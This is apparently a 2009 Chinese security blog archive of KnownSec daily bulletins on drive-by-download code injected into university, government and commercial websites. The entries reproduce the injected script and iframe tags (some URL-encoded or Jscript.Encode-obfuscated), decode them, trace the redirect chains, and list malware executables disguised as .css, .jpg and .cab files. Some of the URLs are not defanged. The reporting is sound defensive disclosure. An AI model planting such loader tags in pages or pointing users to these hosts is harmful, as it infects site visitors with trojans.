This theme is downloaded from wordpress themes website.

Archive for January, 2009

2009年1月25日挂马简报

发布时间:Sun Jan 25 2009 17:42:08 UTC+0800
最后更新时间:Sun Jan 25 2009 17:42:08 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:农林科技学院首页、江西财经大学、南京晓庄学院80周年校庆专题网、
 

农林科技学院首页(hxxp://nlkjxy.hebeinu.edu.cn/)底部被植入恶意代码:
<script language=javascript src=hxxp://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
恶意链接地址解密后为:
hxxp://w.94saomm.com/js.js
通过漏洞攻击,最终下载病毒:
hxxp://m.wuc8.com/mm.exe
 

江西财经大学(hxxp://jcmba.jxufe.edu.cn/)底部被植入恶意代码:
 <iFrame src=hxxp://WWW.bengchivv.cn/one/a46.htm Width=50 HeigHt=0 name=8453 boRdeR=0></ifRame>

 <ifraMe src=hxxp://www.bengchinn.cn/one/a26.htm widTh=50 height=0 name=6915 border=0></iFrame>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css

南京晓庄学院80周年校庆专题网(hxxp://xq80.njxzc.edu.cn/)底部被植入恶意代码:
<script src=hxxp://%75%69%6E%32%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://uin2.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 6% [?]

网站挂马记录 lk 25 Jan 2009 No Comments

2009年1月24日挂马简报

发布时间:Sat Jan 24 2009 16:36:53 UTC+0800
最后更新时间:Sat Jan 24 2009 16:36:53 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:郑州轻工业学院学报、金昌教育、江西农业大学国土资源与环境学院、东北师范大学党委组织部、
 

郑州轻工业学院学报(hxxp://xb.zzuli.edu.cn/)被植入恶意代码:
<script src=hxxp://%76%76%6B%33%2E%63%6E></script>
<script src=hxxp://%76%76%6B%35%2E%63%6E></script>
<script src=hxxp://%68%68%6A%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://vvk3.cn></script>
<script src=hxxp://vvk5.cn></script>
<script src=hxxp://hhj7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

金昌教育(hxxp://www.gsjcedu.cn/)底部被植入恶意代码:
<script src=hxxp://%76%76%6B%33%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://vvk3.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

江西农业大学国土资源与环境学院(hxxp://guotu.jxau.edu.cn/)多处被植入恶意代码:
<iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe><iframe src=hxxp://www.bengchizz.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%68%68%6A%33%2E%63%6E></script>
<script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script>
恶意链接地址解密后为:
<iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe><iframe src=hxxp://www.bengchizz.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://hhj3.cn></script>
<script src=hxxp://vvk5.cn></script><script src=hxxp://hhj7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

东北师范大学党委组织部(hxxp://zzb.nenu.edu.cn/)多处被植入恶意代码:
<script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://hhj7.cn></script><script src=hxxp://vvk7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 7% [?]

网站挂马记录 lk 24 Jan 2009 No Comments

潍坊市公安机关报警求助举报服务平台

发布时间:Fri Jan 23 2009 19:23:46 UTC+0800
最后更新时间:Fri Jan 23 2009 19:23:46 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 潍坊市公安机关报警求助举报服务平台(http://www.weifang.cyberpolice.cn/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.weifang.cyberpolice.cn/

在网页中被嵌入恶意链接代码:

snap4.jpg

<script src=http://%33bomb.com/c.js></script>

挂马分析:
[wide]http://www.weifang.cyberpolice.cn/
 [script]http://%33bomb.com/c.js
  [frame]http://www.bengchizz.cn/llsg/2.htm
   [frame]http://www.709sese.cn/a114/fxx.htm
    [frame]http://www.709sese.cn/a114/fx.htm
    [frame]http://www.709sese.cn/a114/../a1/ss.htm
     [script]http://www.709sese.cn/a114/../a1/woriniss.js
      [exe]http://d.oixka.com/down/gr.exe
    [frame]http://www.709sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.709sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.709sese.cn/a114/../a1/no.htm
     [script]http://www.709sese.cn/a114/../a1/wokaono.js
      [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.709sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.709sese.cn/a114/../a1/glworld.html
     [script]http://www.709sese.cn/a114/../a1/hohogl.js
      [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.709sese.cn/a114/../a1/real.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.709sese.cn/a114/../a1/real.html
     [script]http://www.709sese.cn/a114/../a1/realdadong.js
      [exe]http://d.oixka.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystet.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
 [script]http://%33bomb.com/c.js
 [script]http://%33bomb.com/c.js
 [script]http://%33bomb.com/c.js
 
最终下载病毒文件:
http://d.oixka.com/down/gr.exe
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 7% [?]

网站挂马记录 lk 23 Jan 2009 No Comments

火狐游戏网被植入恶意代码

发布时间:Fri Jan 23 2009 15:52:41 UTC+0800
最后更新时间:Fri Jan 23 2009 15:52:41 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 火狐游戏网(http://www.skyhu.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.skyhu.com/skyhumanage/templet/head/skyhutop_white.js

在网页底部被嵌入一段恶意链接代码:

snap5.jpg

document.write(”<script language=javascript src=http://%70%61%67%65%61%64%32%2E%67%6F%6F%67%6C%65%6E%61%74%69%6F%6E%73%2E%63%6E/show_ads.js></script>”);
链接解密结果为:
http://pagead2.googlenations.cn/show_ads.js

挂马分析:
[wide]http://www.skyhu.com/
 [script]http://www.skyhu.com/scripts/ac_runactivecontent.js
 [script]http://www.skyhu.com/skyhumanage/templet/head/skyhutop_white.js
  [frame]http://www.skyhu.com/skyhumanage/templet/head/skyhutop_white.html
  [script]http://%70%61%67%65%61%64%32%2e%67%6f%6f%67%6c%65%6e%61%74%69%6f%6e%73%2e%63%6e/show_ads.js
   [frame]http://go.keke03.cn/w04/w04.htm
    [frame]http://go.keke03.cn/w04/new.html
     [frame]http://go.keke03.cn/w04/../as.htm
      [exe]http://wwww.ttfabb.com/wl.css
     [frame]http://go.keke03.cn/w04/for.htm
      [exe]http://wwww.ttfabb.com/w04.css
     [frame]http://go.keke03.cn/w04/../gword.htm
      [script]http://go.keke03.cn/w04/../glz.js
       [exe]http://wwww.ttfafb.com/wl.css
     [frame]http://go.keke03.cn/w04/../baozi.htm
      [script]http://go.keke03.cn/w04/../baozi.js
       [exe]http://wwww.ttfafb.com/wl.css
     [frame]http://go.keke03.cn/w04/../all10.htm
      [exe]http://wwww.ttfabb.com/wl.css
     [frame]http://go.keke03.cn/w04/../all11.htm
      [script]http://go.keke03.cn/w04/../realdadong.js
        [exe]http://wwww.ttfafb.com/wl.css
     [frame]http://go.keke03.cn/w04/fx.htm
     [frame]http://go.keke03.cn/w04/../supp.htm
      [script]http://go.keke03.cn/w04/../cx.js
        [exe]http://wwww.ttfafb.com/wl.css
     [exe]http://wwww.ttfabb.com/wl.css
     [cab]http://wwww.ttfabb.com/baidu.cab
    [script]http://js.t0ngji.cn.yahoo.com/841705/ystat.js
    [script]http://js.tongji.cn.yahoo.com/841705/ystat.js
    [script]http://count1.51much.com/cnt.php?uid=ua-1-12435&style=icon&logo=1
   [frame]http://pagead2.googlenations.cn/51.html
 [script]http://www.skyhu.com/skyhumanage/ad/js_59.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_51.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_52.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_50.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_54.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_55.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_56.js
 [script]http://www.skyhu.com/skyhumanage/ad/js_53.js
 [frame]http://www.skyhu.com/skyhumanage/xyx.asp
 [script]http://www.skyhu.com/skyhumanage/ad/js_14.js
 [frame]http://pic.skyhu.com/tuku.asp
 [frame]http://mh.skyhu.com/manhua.htm
 [script]http://bbs.skyhu.com/api/javascript.php?key=threads_shouyediaoyong
 [script]http://bbs.skyhu.com/api/javascript.php?key=threads_shouyejinghua
 [script]http://www.skyhu.com//skyhumanage/html/ad/links.js
 [script]http://js.users.51.la/1641539.js
 [script]http://w.cnzz.com/c.php?id=30003500
 [cab]http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件:
http://wwww.ttfabb.com/wl.css
http://wwww.ttfabb.com/w04.css
http://wwww.ttfabb.com/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 4% [?]

网站挂马记录 lk 23 Jan 2009 No Comments

波普网被植入恶意代码

发布时间:Fri Jan 23 2009 09:37:34 UTC+0800
最后更新时间:Fri Jan 23 2009 09:37:34 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 波普网(http://www.lifepop.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.lifepop.com/inc/counter.htm

在脚本文件中被嵌入一段恶意链接代码:

snap1.jpg 

<script language=”Jscript.Encode”>#@~^SwAAAA==[Km;s+ YRSDbO+vJ@!/1Dr2DP/M^’4YYal&zmNcLr%0 1Whz6rVz[CcL/@*@!’zdmMraY@*r#pnxgAAA==^#~@</script>

挂马分析:
[wide]http://www.lifepop.com/
 [frame]http://www.lifepop.com//inc/counter.htm
  [script]http://ad.ji88.com/file/da.js
   [script]http://ad.ji88.com/file/ad.js
    [script]http://ww.ji88.com/file/logo.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/swf/swfobject.gif
    [script]http://ww.ji88.com/file/f1.gif
    [script]http://ww.ji88.com/file/swf/swfobject.gif
    [script]http://ww.ji88.com/file/f2.gif
    [script]http://ww.ji88.com/file/real.gif
     [exe]http://ww.ji88.com/file/mm.exe
    [script]http://ww.ji88.com/file/real2.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/real11.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/lz3.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/lz2.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/lz.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/bf.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/pps.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/xunlei.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/xunlei5.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/sdr2.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [script]http://ww.ji88.com/file/sdr.gif
     [exe]http://ww.ji88.com/file/images/mm.jpg
    [frame]http://count23.51yes.com/sa.aspx?id=238288070
    [script]http://ww.ji88.com/file/ie7.gif
     [exe]http://ww.ppkok.cn/file/qq.exe

最终下载病毒文件:
http://ww.ji88.com/file/images/mm.jpg
http://ww.ji88.com/file/mm.exe
http://ww.ppkok.cn/file/qq.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 5% [?]

网站挂马记录 lk 23 Jan 2009 No Comments

新闻周刊中文网被植入恶意代码

发布时间:Fri Jan 23 2009 09:37:34 UTC+0800
最后更新时间:Fri Jan 23 2009 09:37:34 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 新闻周刊中文网(http://www.newsweekchinese.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.newsweekchinese.com/data/js/config.js

在脚本文件中被嵌入一段恶意链接代码:

snap3.jpg

document.writeln(”<script src=http:\/\/52-o.cn\/games.gif><\/script>”);

挂马分析:
[wide]http://www.newsweekchinese.com/
 [script]http://www.newsweekchinese.com//data/js/config.js
  [script]http://52-o.cn/games.gif
   [frame]http://alnnama.3322.org/b057850/b05.htm
    [frame]http://alnnama.3322.org/b057850/new.html
     [frame]http://alnnama.3322.org/b057850/../as.htm
      [exe]http://qq.18i16.net/exe1/ce.css
     [frame]http://alnnama.3322.org/b057850/../14.htm
      [exe]http://qq.18i16.net/exe1/ms.css
     [frame]http://alnnama.3322.org/b057850/lzz.htm
      [exe]http://qq.18i16.net/exe1/b05.css
     [frame]http://alnnama.3322.org/b057850/../bfyy.htm
      [exe]http://qq.18i16.net/exe1/bf.css
     [frame]http://alnnama.3322.org/b057850/../real10.htm
      [exe]http://qq.18i16.net/exe1/re.css
     [frame]http://alnnama.3322.org/b057850/real11.htm
      [exe]http://qq.18i16.net/exe1/b05.css
     [frame]http://alnnama.3322.org/b057850/fx.htm
     [frame]http://alnnama.3322.org/b057850/../cx.htm
      [exe]http://121.12.173.218/exe1/cx.css
     [exe]http://qq.18i16.net/sina.css
     [cab]http://qq.18i16.net/baidu.cab
    [frame]http://aaddka.3322.org/tj/b05.htm
    [script]http://js.tongji.cn.yahoo.com/859818/ystat.js
    [script]http://s23.cnzz.com/stat.php?id=1138895&web_id=1138895
 [script]http://www.newsweekchinese.com//include/js/common.js
 [script]http://www.newsweekchinese.com//include/js/prototype.js
 [script]http://www.newsweekchinese.com//member/login.php?action=js
 [script]http://www.newsweekchinese.com//include/js/time.js
 [script]http://www.newsweekchinese.com//member/login.php?action=js
 [script]http://www.newsweekchinese.com//data/js/search.js
 [script]http://www.newsweekchinese.com//data/newsweek.php?id=1
 [script]http://www.newsweekchinese.com//data/newsweek.php?id=18
 [script]http://www.newsweekchinese.com//data/newsweek.php?id=11
 [script]http://www.newsweekchinese.com//data/newsweek.php?id=12
 [script]http://www.newsweekchinese.com//data/newsweek.php?id=13
 [script]http://www.newsweekchinese.com//stat/stat.php
 [script]http://js.tongji.cn.yahoo.com/839252/ystat.js
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

最终下载病毒文件:
http://qq.18i16.net/exe1/ce.css
http://qq.18i16.net/exe1/ms.css
http://qq.18i16.net/exe1/b16.css
http://qq.18i16.net/exe1/bf.css
http://qq.18i16.net/exe1/re.css
http://121.12.173.218/exe1/cx.css
http://qq.18i16.net/sina.css
http://qq.18i16.net/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 7% [?]

网站挂马记录 lk 23 Jan 2009 No Comments

2009年1月22日挂马简报

发布时间:Thu Jan 22 2009 21:46:06 UTC+0800
最后更新时间:Thu Jan 22 2009 21:46:06 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:长春医保、温州市鸿亨眼镜有限公司、上海保洁公司联盟中心、发布时间:Thu Jan 22 2009 19:45:11 UTC+0800
最后更新时间:Thu Jan 22 2009 19:45:11 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:
 

长春医保(hxxp://www.ccyb.gov.cn/js/show_top.js)被植入恶意代码:
document.write(’<script src=hxxp://4007058058.com/sw/js/ad-01.js></script>’);
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

温州市鸿亨眼镜有限公司(hxxp://hongheng.66yj.com/)多处被植入恶意代码:
<script src=hxxp://3bomb.%63om/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

上海保洁公司联盟中心(hxxp://www.baojie99.com/)多处被植入恶意代码:
<script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://vvk7.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.oixka.com/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 5% [?]

网站挂马记录 lk 22 Jan 2009 No Comments

IT法律咨询专家网被植入恶意代码

发布时间:Thu Jan 22 2009 19:45:11 UTC+0800
最后更新时间:Thu Jan 22 2009 19:45:11 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 IT法律咨询专家网(http://itlaw.com.cn/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://itlaw.com.cn/

在网页底部被嵌入一段恶意链接代码:

snap2.jpg

<script src=http://ufdb81.chinaw3.com/js/j.js></script>

挂马分析:
[wide]http://itlaw.com.cn/
 [script]http://ufdb81.chinaw3.com/js/j.js
  [frame]http://doublcclick.3322.org/b165439/b16.htm
   [frame]http://doublcclick.3322.org/b165439/new.html
    [frame]http://doublcclick.3322.org/b165439/../as.htm
     [exe]http://qq.18i16.net/exe1/ce.css
    [frame]http://doublcclick.3322.org/b165439/../14.htm
     [exe]http://qq.18i16.net/exe1/ms.css
    [frame]http://doublcclick.3322.org/b165439/lzz.htm
     [exe]http://qq.18i16.net/exe1/b16.css
    [frame]http://doublcclick.3322.org/b165439/../bfyy.htm
     [exe]http://qq.18i16.net/exe1/bf.css
    [frame]http://doublcclick.3322.org/b165439/../real10.htm
     [exe]http://qq.18i16.net/exe1/re.css
    [frame]http://doublcclick.3322.org/b165439/real11.htm
     [exe]http://qq.18i16.net/exe1/b16.css
    [frame]http://doublcclick.3322.org/b165439/fx.htm
    [frame]http://doublcclick.3322.org/b165439/../cx.htm
     [exe]http://121.12.173.218/exe1/cx.css
    [exe]http://qq.18i16.net/sina.css
    [cab]http://qq.18i16.net/baidu.cab
   [frame]http://aaddka.3322.org/tj/b16.htm
   [script]http://js.tongji.cn.yahoo.com/859818/ystat.js
   [script]http://s75.cnzz.com/stat.php?id=1138913&web_id=1138913
  [script]http://js.tongji.cn.yahoo.com/903009/ystat.js
  [cab]http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
 [script]http://s118.cnzz.com/stat.php?id=485400&web_id=485400

最终下载病毒文件:
http://qq.18i16.net/exe1/ce.css
http://qq.18i16.net/exe1/ms.css
http://qq.18i16.net/exe1/b16.css
http://qq.18i16.net/exe1/bf.css
http://qq.18i16.net/exe1/re.css
http://121.12.173.218/exe1/cx.css
http://qq.18i16.net/sina.css
http://qq.18i16.net/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 6% [?]

网站挂马记录 lk 22 Jan 2009 No Comments

2009年1月21日挂马简报

发布时间:Wed Jan 21 2009 09:50:20 UTC+0800
最后更新时间:Wed Jan 21 2009 09:50:20 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:嘉兴照相婚庆网、江阴新生活国际家居广场、金利来家具城、吉林省参茸网络交易中心、中国idc导航门户、
 

嘉兴照相婚庆网(hxxp://www.jxzxhq.com/)多处被植入恶意代码:
<script src=hxxp://%76%76%6B%35%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://vvk5.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.bc-s350.cn/down/gr.exe
hxxp://d.oixka.com/new/a1.css

江阴新生活国际家居广场(hxxp://www.jyxsh.com.cn/)底部被植入恶意代码:
<script src=hxxp://%76%76%6B%35%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://vvk5.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.bc-s350.cn/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

金利来家具城(hxxp://www.jlljjc.cn/)底部被植入恶意代码:
<script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script>
恶意链接地址解密后为:
hxxp://vvk5.cn
hxxp://hhj7.cn
通过漏洞攻击,最终下载病毒:
hxxp://d.bc-s350.cn/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

吉林省参茸网络交易中心(hxxp://www.jlttc.com/)多处被植入恶意代码:
<script src=hxxp://3bomb.c%6Fm/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.bc-s350.cn/down/gr.exe
hxxp://d.oixka.com/new/a1.css
 

中国idc导航门户()底部被植入恶意代码:
<iframe src=hxxp://qqqqkkkss.cn/2/zhan.htm?007 width=50 height=0></iframe>
通过漏洞攻击,最终下载病毒:
hxxp://rrrrpppkk.cn/2.exe
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 8% [?]

网站挂马记录 lk 21 Jan 2009 No Comments

2009年1月20日挂马简报

发布时间:Tue Jan 20 2009 16:27:16 UTC+0800
最后更新时间:Tue Jan 20 2009 16:27:16 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:华夏管理网、伴游天下网、好公会、
 

华夏管理网(hxxp://managers.com.cn/)多处被植入恶意代码:
<script src=hxxp://3bom%62.com/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.bc-s350.cn/down/gr.exe
hxxp://d.oixka.com/new/a1.css
hxxp://d.bc-s350.cn/new/a1.css
 

伴游天下网(hxxp://travelby.cn/js/ck_form.js)底部被植入恶意代码:
document.writeln(”<iframe src=hxxp://nnnndddaa.cn/1/jd02.htm?029 width=50 height=0></iframe> “);
通过漏洞攻击,最终下载病毒:
hxxp://rrrrpppkk.cn/1.exe
 

好公会(hxxp://www.haogh.net/include/dedeajax2.js)底部被植入恶意代码:
document.write(”<script src=\”hxxp://568g.com.cn/320_130.js\”><\/script>”)
通过漏洞攻击,最终下载病毒:
hxxp://qq.18i16.net/sina.css
hxxp://qq.18i16.net/baidu.cab
hxxp://qq.18i16.net/exe1/ce.css
hxxp://qq.18i16.net/exe1/ms.css
hxxp://qq.18i16.net/exe1/b09.css
hxxp://qq.18i16.net/exe1/bf.css
hxxp://qq.18i16.net/exe1/re.css
hxxp://121.12.173.218/exe1/cx.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 7% [?]

网站挂马记录 lk 20 Jan 2009 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.